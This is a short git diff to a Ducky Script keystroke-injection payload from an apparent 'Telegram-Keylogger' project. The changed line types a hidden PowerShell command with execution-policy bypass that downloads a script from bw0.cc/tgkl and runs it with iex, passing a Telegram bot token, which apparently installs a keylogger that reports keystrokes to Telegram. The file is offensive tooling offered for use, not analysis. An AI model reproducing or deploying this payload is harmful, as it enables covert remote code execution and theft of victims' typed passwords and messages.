diff --git a/Telegram-Keylogger/Keylogger-to-Telegram.txt b/Telegram-Keylogger/Keylogger-to-Telegram.txt index 1f1940d..7c73358 100644 --- a/Telegram-Keylogger/Keylogger-to-Telegram.txt +++ b/Telegram-Keylogger/Keylogger-to-Telegram.txt @@ -14,7 +14,7 @@ REM open powershell (remove "-W H" to show the window) DELAY 1000 GUI r DELAY 750 -STRING powershell -NoP -Ep Bypass -W H -C $tg='TOKEN_HERE'; irm https://bw0.cc/tgkl | iex +STRING powershell -Ep Bypass -W H -C $tg='TOKEN_HERE'; iex (irm bw0.cc/tgkl) ENTER